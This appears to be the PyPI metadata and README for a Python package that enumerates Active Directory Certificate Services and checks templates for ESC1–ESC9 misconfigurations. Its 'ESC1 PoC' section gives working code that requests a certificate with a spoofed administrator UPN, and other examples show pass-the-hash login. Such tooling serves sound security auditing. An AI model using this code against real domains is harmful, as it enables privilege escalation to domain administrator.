Metadata-Version: 2.4
Name: impacket-adcs
Version: 0.1.0
Summary: Active Directory Certificate Services (AD CS) enumeration, vulnerability analysis, and certificate request module for Impacket
Home-page: https://github.com/MrHarshvardhan/impacket-adcs
Author: MrHarshvardhan
Author-email: buddy4130@gmail.com
License: Apache Software License 2.0
Keywords: impacket,active-directory,adcs,certificates,penetration-testing,red-team,esc1,esc6,pki,kerberos,ldap,security-research
Classifier: Development Status :: 3 - Alpha
Classifier: Environment :: Console
Classifier: Intended Audience :: Information Technology
Classifier: Intended Audience :: Science/Research
Classifier: License :: OSI Approved :: Apache Software License
Classifier: Operating System :: OS Independent
Classifier: Programming Language :: Python :: 3
Classifier: Programming Language :: Python :: 3.8
Classifier: Programming Language :: Python :: 3.9
Classifier: Programming Language :: Python :: 3.10
Classifier: Programming Language :: Python :: 3.11
Classifier: Programming Language :: Python :: 3.12
Classifier: Topic :: Security
Classifier: Topic :: System :: Networking
Requires-Python: >=3.8
Description-Content-Type: text/markdown
License-File: LICENSE
Requires-Dist: impacket>=0.11.0
Requires-Dist: cryptography>=3.4
Requires-Dist: pyasn1>=0.4
Provides-Extra: dev
Requires-Dist: pytest>=7.0; extra == "dev"
Requires-Dist: pytest-cov; extra == "dev"
Requires-Dist: build; extra == "dev"
Requires-Dist: twine; extra == "dev"
Dynamic: author
Dynamic: author-email
Dynamic: classifier
Dynamic: description
Dynamic: description-content-type
Dynamic: home-page
Dynamic: keywords
Dynamic: license
Dynamic: license-file
Dynamic: provides-extra
Dynamic: requires-dist
Dynamic: requires-python
Dynamic: summary

# impacket-adcs

Active Directory Certificate Services (AD CS) enumeration, analysis, and certificate request module for the [Impacket](https://github.com/fortra/impacket) ecosystem.

---

## Overview

This module provides:

- **LDAP-based enumeration** of CA enrollment services and certificate templates
- **Vulnerability analysis** covering ESC1–ESC9 classes (SpecterOps "Certified Pre-Owned")
- **Certificate request engine** via MS-ICPR RPC and HTTP Web Enrollment
- **Structured reporting** in text, Markdown, and JSON formats
- **Clean Python API** following Impacket's module conventions

## Installation

```bash
pip install impacket-adcs
# or from source:
git clone https://github.com/MrHarshvardhan/impacket-adcs
cd impacket-adcs
pip install -e ".[dev]"
```

## Quick Start

### Command-line

```bash
# Password auth
python examples/adcs_enum.py corp.local/jdoe:Password1@dc01.corp.local

# NTLM hash
python examples/adcs_enum.py corp.local/jdoe@dc01 -hashes :31d6cfe0d16ae931b73c59d7e0c089c0

# Kerberos (reads from KRB5CCNAME)
python examples/adcs_enum.py corp.local/jdoe@dc01 -k -no-pass

# Output to Markdown report
python examples/adcs_enum.py corp.local/jdoe:Password1@dc01 -output report -format markdown

# Show only vulnerable objects
python examples/adcs_enum.py corp.local/jdoe:Password1@dc01 -vuln-only

# JSON output (pipe to jq)
python examples/adcs_enum.py corp.local/jdoe:Password1@dc01 -format json | jq .findings
```

### Python API

```python
from impacket.ldap import ldap
from impacket_adcs import ADCSEnumerator, ADCSAnalyzer, ADCSReporter

# 1. Authenticate
conn = ldap.LDAPConnection('ldap://dc01.corp.local', 'dc=corp,dc=local')
conn.login('jdoe', 'Password1', 'corp.local')

# 2. Enumerate
enumerator = ADCSEnumerator(conn, 'corp.local')
snapshot = enumerator.enumerate()

# 3. Analyze
analyzer = ADCSAnalyzer()
analyzer.analyze(snapshot)

# 4. Report
reporter = ADCSReporter(snapshot)
print(reporter.to_text())
reporter.save('adcs_findings.md', fmt='markdown')
reporter.save('adcs_findings.json', fmt='json')
```

### Certificate Request (ESC1 PoC)

```python
from impacket.dcerpc.v5 import transport, icpr
from impacket_adcs import CertificateRequester

# Set up RPC transport
rpctransport = transport.DCERPCTransportFactory(r'ncacn_np:DC01[\pipe\cert]')
rpctransport.set_credentials('jdoe', 'Password1', 'corp.local')
dce = rpctransport.get_dce_rpc()
dce.connect()
dce.bind(icpr.MSRPC_UUID_ICPR)

# Request cert with spoofed UPN (ESC1)
requester = CertificateRequester(dce_connection=dce)
key_pem, cert_pem = requester.request_certificate(
    ca_name='corp-DC01-CA',
    template='VulnerableTemplate',
    subject='CN=jdoe',
    san_upn='administrator@corp.local',   # ESC1: arbitrary UPN
)

with open('admin.key', 'wb') as f: f.write(key_pem)
with open('admin.crt', 'wb') as f: f.write(cert_pem)
print("[+] Certificate issued for administrator@corp.local")
```

---

## Vulnerability Coverage

| Class | Description | Severity |
|-------|-------------|----------|
| ESC1  | Enrollee-supplied SAN + auth EKU + low enroll rights | CRITICAL |
| ESC2  | Any Purpose EKU or no EKU | HIGH |
| ESC3  | Enrollment Agent template accessible to low-priv users | HIGH |
| ESC4  | Template ACL grants write to low-priv principal | HIGH |
| ESC6  | CA allows user-specified SAN (EDITF_ATTRIBUTESUBJECTALTNAME2) | CRITICAL |
| ESC7  | CA ACL grants ManageCA/ManageCertificates to low-priv users | HIGH |
| ESC8  | HTTP Web Enrollment endpoint vulnerable to NTLM relay | HIGH |
| ESC9  | Certificate lacks NTDS CA Security Extension | MEDIUM |

ESC5, ESC10, ESC11, and ESC13 are not yet implemented (contributions welcome).

---

## Architecture

```
impacket_adcs/
├── __init__.py          # Public API surface
├── constants.py         # OIDs, bitmasks, LDAP attribute names
├── structures.py        # Dataclasses: CertificateTemplate, CertificateAuthority, etc.
├── enumerator.py        # LDAP-based discovery (ADCSEnumerator)
├── analyzer.py          # ESC vulnerability detection (ADCSAnalyzer)
├── requester.py         # Certificate enrollment via RPC/HTTP (CertificateRequester)
└── reporter.py          # Text/Markdown/JSON output (ADCSReporter)

examples/
└── adcs_enum.py         # CLI entry point

tests/
└── test_analyzer.py     # Unit tests (pytest, no AD required)
```

---

## Running Tests

```bash
pip install pytest
python -m pytest tests/ -v
```

All tests are offline — no Active Directory connection required.

---

## Protocol References

- [MS-WCCE]: Windows Client Certificate Enrollment Protocol
- [MS-ICPR]: ICertPassage Remote Protocol
- [MS-ADTS]: Active Directory Technical Specification, section 3.1.1.5 (PKI objects)
- [MS-CRTD]: Certificate Templates Structure, sections 2.27–2.28
- RFC 5280: Internet X.509 PKI Certificate and CRL Profile
- SpecterOps "Certified Pre-Owned" (Schroeder & Christensen, 2021)

---

## Relationship to Existing Tools

This module complements rather than replaces existing tools:

| Tool | Language | Protocol | This module's advantage |
|------|----------|----------|------------------------|
| [Certipy](https://github.com/ly4k/Certipy) | Python | LDAP+RPC | Impacket-native integration |
| [Certify](https://github.com/GhostPack/Certify) | C# (.NET) | LDAP+DCOM | Pure Python, no .NET |
| [PSPKIAudit](https://github.com/GhostPack/PSPKIAudit) | PowerShell | ADCS API | Remote, no PS execution |

---

## Contributing

Contributions welcome. Priority areas:

1. ESC5, ESC10, ESC11, ESC13 detection
2. Full CMC request wrapping for ESC3 (PKCS#7 SignedData)
3. SID-to-name resolution via LDAP
4. LDAPS support
5. Kerberos PKINIT post-exploitation module (separate PR)

Please follow Impacket's contribution guidelines and include tests for all new ESC checks.

---
